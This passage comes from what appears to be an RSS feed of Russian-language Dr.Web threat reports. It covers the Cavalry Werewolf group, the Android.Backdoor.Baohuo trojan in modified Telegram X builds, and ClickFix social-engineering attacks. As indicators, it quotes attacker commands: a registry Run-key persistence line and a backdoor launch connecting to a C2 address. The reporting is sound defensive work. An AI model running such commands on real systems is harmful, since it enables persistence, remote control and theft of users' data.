&lt;p&gt;Для закрепления в системе:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Могут модифицировать системный реестр Windows (например: &lt;span class="string"&gt;REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — для запуска &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\pictures\\732.exe&lt;/span&gt;  — для запуска &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для удаления инструментов могут использовать PowerShell. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Злоумышленники также могут периодически проверять доступность С2-серверов через команду &lt;span class="string"&gt;ping&lt;/span&gt;.&lt;/p&gt;
&lt;h3&gt;Особенности группировки Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;&lt;/li&gt;
    &lt;li&gt;основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;&lt;/li&gt;
    &lt;li&gt;с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;&lt;/li&gt;
    &lt;li&gt;часто применяют Telegram API для управления зараженными компьютерами;&lt;/li&gt;
    &lt;li&gt;для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;&lt;/li&gt;
    &lt;li&gt;для загрузки последующих стадий заражения на целевое устройство используют директории &lt;span class="string"&gt;C:\\users\\public\\pictures&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\libraries&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\downloads&lt;/span&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;
&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseShell.10&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.RShell.169&amp;lng=kk"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.2&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Siggen2.5463&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Tunnel.41&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BAT.DownLoader.1138&amp;lng=kk"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Clipper.808&amp;lng=kk"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.FileSpyNET.5&amp;lng=kk"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Inject5.57968&amp;lng=kk"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49862&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h3&gt;Матрица MITRE&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Первоначальный доступ&lt;/td&gt;
            &lt;td&gt;Целевой фишинг с вложением (T1566.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Внешний прокси-сервер (T1090.002)&lt;br /&gt;&lt;br /&gt;Двусторонняя связь (T1102.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Эксфильтрация данных&lt;/td&gt;
            &lt;td&gt;Эксфильтрация по каналу управления (T1041)&lt;br /&gt;&lt;br /&gt;Эксфильтрация через веб-службу (T1567)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15076&amp;lng=kk</guid><title>Серый кардинал Baohuo. Android-бэкдор захватывает учетные записи Telegram, получая над ними полный контроль</title><link>https://news.drweb.kz/show/?i=15076&amp;lng=kk&amp;c=23</link><pubDate>Thu, 23 Oct 2025 12:15:33 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;23 октября 2025 года&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Компания «Доктор Веб» выявила опасный бэкдор &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; в модифицированных злоумышленниками версиях мессенджера Telegram X. Помимо возможности похищать конфиденциальные данные, включая логин и пароль пользователя, а также историю переписки, это ВПО обладает рядом уникальных особенностей. Например, чтобы предотвратить свое обнаружение и скрыть факт компрометации учетной записи, &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; умеет скрывать в списке активных сеансов Telegram подключения со сторонних устройств. Кроме того, он может добавлять и исключать пользователя из Telegram-каналов, вступать от его лица в чаты и выходить из них, также скрывая эти действия. Фактически с его помощью злоумышленники получают полный контроль над учетной записью жертвы и функциями мессенджера, а сам троян является инструментом для накрутки числа подписчиков в Telegram-каналах. Киберпреступники управляют бэкдором в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. По оценкам наших специалистов общее число устройств, зараженных &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, превысило 58 000.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Распространение&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; началось в середине 2024 года, о чем свидетельствуют найденные при его анализе более ранние модификации. Основным способом доставки бэкдора на целевые устройства является реклама внутри мобильных приложений. Потенциальным жертвам демонстрируются объявления, в которых предлагается установить мессенджер Telegram X. При нажатии на баннер пользователи перенаправляются на вредоносные сайты, с которых и происходит загрузка троянского APK.&lt;/p&gt;&lt;p&gt;Эти сайты оформлены в стиле магазина приложений, а сам мессенджер позиционируется на них как площадка для удобного поиска партнера для общения и свиданий. Об этом говорят как баннеры с наложенным на них рекламным текстом о «бесплатных видеочатах» и с приглашениями «поговорить» (например, под видом скриншотов окна видеовызова), так и сочиненные злоумышленниками отзывы якобы довольных пользователей. Отметим, что на веб-страницах предусмотрена возможность выбора языка оформления, однако сами изображения при этом не меняются.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Один из вредоносных сайтов, с которых загружается троянская версия Telegram X. Потенциальным жертвам предлагается установить программу, где согласно «отзывам», легко найти партнера для общения и свиданий&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В настоящее время киберпреступники подготовили типовые шаблоны с баннерами только для двух языков: португальского с ориентиром на пользователей из Бразилии, а также индонезийского. Таким образом, жители Бразилии и Индонезии являются главной целью для атакующих. В то же время нельзя исключать, что со временем интерес злоумышленников распространится и на пользователей из других стран.&lt;/p&gt;&lt;p&gt;Изучение сетевой инфраструктуры атакующих позволило определить масштаб их деятельности. В среднем вирусные аналитики «Доктор Веб» наблюдают порядка 20 000 активных подключений &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. При этом общее число зараженных устройств превысило 58 000. Заражению подверглись около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_ru.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_ru.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Страны с наибольшим числом устройств, зараженных&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; (по данным антивирусной лаборатории «Доктор Веб»)&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Однако&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; распространяется не только через вредоносные сайты: наши специалисты обнаружили его и в сторонних каталогах Android-приложений — например, APKPure, ApkSum и AndroidP. При этом в магазине APKPure он размещен от имени официального разработчика мессенджера, несмотря на то, что цифровые подписи оригинала и троянской модификации отличаются. Мы уведомили онлайн-площадки, в которых были найдены троянские версии Telegram X.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Модифицированный Telegram X с внедренным&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; распространялся в APKPure от имени настоящего разработчика мессенджера&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Антивирусная лаборатория «Доктор Веб» выявила несколько разновидностей &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которые условно можно разделить на 3 основные группы модификаций Telegram X:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;версии, в которых злоумышленники встроили бэкдор в основной исполняемый DEX-файл мессенджера;&lt;/li&gt;&lt;li&gt;версии, в которых бэкдор в виде патча динамически внедряется в исполняемый DEX-файл при помощи утилиты LSPatch;&lt;/li&gt;&lt;li&gt;версии, в которых бэкдор находится в отдельном DEX-файле в каталоге с ресурсами программы и загружается динамически.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Независимо от типа модификации&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; инициализируется при запуске самого мессенджера. Тот остается работоспособным и для пользователей выглядит как обычная программа. Однако в действительности злоумышленники через бэкдор полностью его контролируют и даже могут изменять логику его работы.&lt;/p&gt;&lt;p&gt;Когда киберпреступникам необходимо выполнить действие, которое не требует вмешательства в основную функциональность программы, используются заранее подготовленные «зеркала» необходимых методов приложения. Например, с их помощью могут отображаться фишинговые сообщения в окнах, которые внешне не будут отличаться от настоящих окон Telegram X.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;i&gt;Методы — это отдельные блоки кода в структуре Android-приложений, которые отвечают за выполнение тех или иных задач.&lt;/i&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Если же действие не является стандартным для программы, то используется фреймворк Xposed, который непосредственно меняет ту или иную функциональность мессенджера через динамическую модификацию методов. В частности, с его помощью скрываются определенные чаты и авторизованные устройства, а также перехватывается содержимое буфера обмена.&lt;/p&gt;&lt;p&gt;Основное отличие ранних версий вредоносного приложения от актуальных — в организации управления трояном. В старых модификациях связь со злоумышленниками и получение от них заданий реализованы традиционным способом — через C2-сервер. Однако со временем вирусописатели добавили в&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; возможность отправки дополнительных команд через базу данных Redis, расширив тем самым его функциональность и обеспечив двумя независимыми каналами управления. При этом они предусмотрели дублирование новых команд и через обычный C2-сервер на случай, если база окажется недоступной. Это первый известный факт применения Redis для управления вредоносным ПО для Android.&lt;/p&gt;&lt;p&gt;Во время запуска&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; соединяется с начальным C2-сервером для загрузки конфигурации, которая среди прочего содержит данные для подключения к Redis. Через эту базу данных злоумышленники не только отправляют определенные команды вредоносному приложению, но и обновляют настройки трояна. В том числе они назначают адрес текущего C2-сервера, а также NPS-сервера. Последний вирусописатели используют для подключения зараженных устройств к своей внутренней сети (интранету) и превращения их в прокси для выхода в интернет.&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;периодически связывается с C2-сервером через API-вызовы и может получать следующие задания:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;загрузить на C2-сервер входящие СМС и контакты из телефонной книги зараженного устройства;&lt;/li&gt;&lt;li&gt;отправить на сервер содержимое буфера обмена при сворачивании мессенджера и возвращении в его окно;&lt;/li&gt;&lt;li&gt;получить от C2-сервера интернет-адреса для демонстрации рекламы, а также адрес сервера для скачивания обновления трояна в виде исполняемого DEX-файла;&lt;/li&gt;&lt;li&gt;получить ключи шифрования, которые используются при отправке некоторых данных на C2-сервер — например, содержимого буфера обмена;&lt;/li&gt;&lt;li&gt;запросить группу команд на сбор информации об установленных на устройстве приложениях, истории сообщений, контактах из телефонной книги устройства и об устройствах, на которых выполнен вход в Telegram (запрос выполняется с интервалом в 30 минут);&lt;/li&gt;&lt;li&gt;запросить у C2-сервера ссылку для скачивания обновления Telegram X;&lt;/li&gt;&lt;li&gt;запросить у C2-сервера конфигурацию, которая сохраняется в виде JSON-файла;&lt;/li&gt;&lt;li&gt;запросить информацию о базе данных Redis;&lt;/li&gt;&lt;li&gt;загрузить на C2-сервер информацию об устройстве при каждой сетевой активности мессенджера;&lt;/li&gt;&lt;li&gt;получить с C2-сервера список ботов, которые затем добавляются в список контактов Telegram;&lt;/li&gt;&lt;li&gt;каждые 3 минуты передавать на сервер информацию о текущих разрешениях приложения, состоянии устройства (включен ли или выключен экран, активно ли приложение), а также номер мобильного телефона с именем и паролем от учетной записи Telegram;&lt;/li&gt;&lt;li&gt;каждую минуту запрашивать команды в формате, аналогичном командам от базы данных Redis.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Для получения команд через Redis&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; подключается к соответствующему серверу злоумышленников, где регистрирует свой подканал — к нему в дальнейшем подключаются киберпреступники. Они публикуют в нем задания, которые бэкдор затем исполняет. Вредоносная программа может получать следующие команды:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;создать черный список чатов, которые не будут отображаться пользователю в окне Telegram X;&lt;/li&gt;&lt;li&gt;скрыть от пользователя заданные устройства в списке авторизованных для его учетной записи;&lt;/li&gt;&lt;li&gt;заблокировать на заданное время отображение уведомлений от чатов из созданного черного списка;&lt;/li&gt;&lt;li&gt;показать окно с информацией об обновлении приложения Telegram X — при нажатии на него пользователь перенаправляется на заданный сайт;&lt;/li&gt;&lt;li&gt;отправить на C2-сервер информацию обо всех установленных приложениях;&lt;/li&gt;&lt;li&gt;сбросить на зараженном устройстве текущую сессию авторизации пользователя в Telegram;&lt;/li&gt;&lt;li&gt;показать окно с информацией об обновлении приложения Telegram X, где пользователю предлагается установить APK-файл (если файл отсутствует, троян предварительно скачивает его);&lt;/li&gt;&lt;li&gt;убрать значок Telegram Premium в интерфейсе приложения у текущего пользователя;&lt;/li&gt;&lt;li&gt;загрузить на C2-сервер информацию из баз данных Telegram X, в которых хранится история чатов, сообщения и другие конфиденциальные данные;&lt;/li&gt;&lt;li&gt;подписать пользователя на заданный Telegram-канал;&lt;/li&gt;&lt;li&gt;покинуть заданный Telegram-канал;&lt;/li&gt;&lt;li&gt;вступить от лица пользователя в Telegram-чат по указанной ссылке;&lt;/li&gt;&lt;li&gt;получить список устройств, на которых выполнена авторизация в Telegram;&lt;/li&gt;&lt;li&gt;запросить получение токена аутентификации пользователя и передать его на С2-сервер.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Отметим, что перехват данных из буфера обмена, когда пользователь сворачивает мессенджер и снова возвращается в его окно, позволяет реализовывать различные сценарии кражи конфиденциальных данных. Например, жертва может скопировать пароль или мнемоническую фразу для входа в криптокошелек, текст важного документа для отправки бизнес-партнерам по почте и т. д., а троян перехватит оставшиеся в буфере данные и передаст злоумышленникам.&lt;/p&gt;&lt;p&gt;Dr.Web Security Space для мобильных устройств успешно обнаруживает и удаляет известные версии бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей он опасности не представляет.&lt;/p&gt;&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.ru/virus/?i=30931099"&gt;&lt;strong&gt;Android.Backdoor.Baohuo.1.origin&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Backdoor.Baohuo.1.origin/README.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15074&amp;lng=kk</guid><title>Как работает атака ClickFix</title><link>https://news.drweb.kz/show/?i=15074&amp;lng=kk&amp;c=23</link><pubDate>Wed, 22 Oct 2025 10:45:13 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Пользователи по всему миру встревожены ростом волны атак ClickFix. Это разновидность социальной инженерии, при которой злоумышленники обманом подталкивают пользователя к самостоятельному запуску вредоносного кода на устройстве.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Атака начинается с визита на взломанный или поддельный сайт, где отображается предупреждение: например, что страница некорректно отображается, произошла ошибка в браузере или требуется обновление.&amp;nbsp;&lt;br&gt;На экране появляется кнопка — «Исправить», «Проверить» или «Обновить». При ее появлении в буфер обмена незаметно копируется вредоносный код, то есть даже не обязательно нажимать на кнопку — копирование автоматическое. Затем пользователю предлагают вставить этот код в командную строку или окно, кликнув «Выполнить». Как только он это делает — вредоносная программа запускается и устанавливается, зачастую без участия антивируса, потому что действия исходят от самого пользователя.&lt;/p&gt;&lt;h3&gt;Ниже представлена имитация упрощенного варианта атаки ClickFix&lt;/h3&gt;&lt;p&gt;Во время запуска и просмотра контента в браузере неожиданно для пользователя появляется предупреждение о том, что что-то пошло не так с отображением содержимого страницы, и ошибки связаны с недавним обновлением браузера.&lt;/p&gt;&lt;figure class="image image_resized"&gt;&lt;img style="aspect-ratio:648/328;" src="https://st.drweb.kz/static/f2_admin/wrong.png" width="648" height="328"&gt;&lt;/figure&gt;&lt;p&gt;Для решения пользователю предлагается выполнить ряд манипуляций по исправлению данной проблемы:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Нажать кнопку исправления «Fix it!»;&lt;/li&gt;&lt;li&gt;Нажать правой кнопкой мыши на иконку Windows;&lt;/li&gt;&lt;li&gt;В списке выбрать Windows PowerShell с правами администратора;&lt;/li&gt;&lt;li&gt;Правой кнопкой мыши вставить код и исполнить.&lt;br&gt;&lt;br&gt;При нажатии кнопки в браузере незаметно для пользователя копируется вредоносный исполняемый скрипт с последующей вставкой его в терминал PowerShell и исполнением:&lt;/li&gt;&lt;/ul&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:601/166;" src="https://st.drweb.kz/static/f2_admin/powershell_EuavSaB.png" width="601" height="166"&gt;&lt;/figure&gt;&lt;p&gt;Скрипт создает удаленное соединение c инфраструктурой C2, которая позволяют злоумышленникам удаленно управлять скомпрометированными системами.&amp;nbsp;&lt;br&gt;В данном случае создается соединение с удаленным хостом C2, скачивается полезная нагрузка в виде исполняемого файла на хост пользователя, который предназначен для модификации файла hosts и запускается механизм его активации с последующим завершением скрипта.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;На этапе запуска вредоносного файла решения Dr.Web обнаруживают его с помощью системы превентивной защиты.&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Еще один распространенный вариант атаки ClickFix — мимикрирование под капчу. На экране появляется якобы легитимная проверка, а в фоновом режиме вредоносный код копируется в буфер обмена. Такая маскировка увеличивает вероятность успешной атаки, заставляя пользователей невольно взаимодействовать с вредоносным контентом и при этом думать, что они просто подтверждают свою человечность.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:931/428;" src="https://st.drweb.kz/static/f2_admin/robot.jpg" width="931" height="428"&gt;&lt;/figure&gt;&lt;p&gt;Следом появляется инструкция по запуску кода.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:912/647;" src="https://st.drweb.kz/static/f2_admin/robot2.jpg" width="912" height="647"&gt;&lt;/figure&gt;&lt;p&gt;Доверчивое выполнение всех шагов открывает злоумышленнику удаленный доступ к устройству: пользователь случайно запускает вредоносный скрипт.&lt;/p&gt;&lt;h3&gt;Почему сложно обнаружить атаку ClickFix&lt;/h3&gt;&lt;p&gt;Когда пользователь нажимает кнопку на вредоносном сайте, никакой угрозы антивирус пока не видит. Это связано с тем, что на первом этапе все действия кажутся вполне законными: пользователь сам копирует команды, сам их вставляет и запускает — как будто делает обычные системные операции.&lt;br&gt;Обнаружение происходит позже — когда запускается вредоносный файл или код пытается встроиться в другие процессы в системе. Именно в этот момент антивирус распознает угрозу и нейтрализует ее. То есть защита срабатывает уже на так называемой постэксплуатационной стадии, когда вредоносное ПО начинает активные действия: вмешивается в защищенные процессы или ведет себя необычно.&lt;br&gt;К этому времени злоумышленник, как правило, уже подключился к системе жертвы. Это значит, что основная вредоносная нагрузка (payload) доставлена, и она может маскироваться под обычные процессы.&lt;br&gt;На этом этапе атакующий способен:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;углубить свое присутствие в системе (получить больше прав),&lt;/li&gt;&lt;li&gt;собирать данные,&lt;/li&gt;&lt;li&gt;перемещаться по сети,&lt;/li&gt;&lt;li&gt;пытаться отключить антивирусную защиту.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Дополнительно вредоносное ПО может быть зашифровано или запутано (обфусцировано), что делает его менее заметным для стандартных механизмов защиты.&lt;/p&gt;&lt;h3&gt;Почему важно действовать на самых ранних этапах&lt;/h3&gt;&lt;p&gt;На этом фоне становится особенно важным не только реагировать на угрозу после ее запуска, но и предотвращать подключение злоумышленника к системе. Для этого могут использоваться такие методы, как:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;проверка содержимого буфера обмена, если в браузере появляются подозрительные сообщения с командами (например, PowerShell),&lt;/li&gt;&lt;li&gt;анализ сетевого трафика и попыток установить подозрительные соединения,&lt;/li&gt;&lt;li&gt;обучение пользователей методам распознавания социальной инженерии — с разбором реальных сценариев атак.&lt;/li&gt;&lt;/ul&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15045&amp;lng=kk</guid><title>Практические рекомендации по усилению безопасности ИТ-инфраструктуры</title><link>https://news.drweb.kz/show/?i=15045&amp;lng=kk&amp;c=23</link><pubDate>Fri, 08 Aug 2025 13:06:15 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;08 августа 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Средства массовой информации почти ежедневно сообщают о кибератаках на различные организации.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Зачастую атаки злоумышленников сопровождаются не только кражей важных коммерческих данных, но и их последующим шифрованием, чтобы нанести максимальный вред компании.&lt;/p&gt;

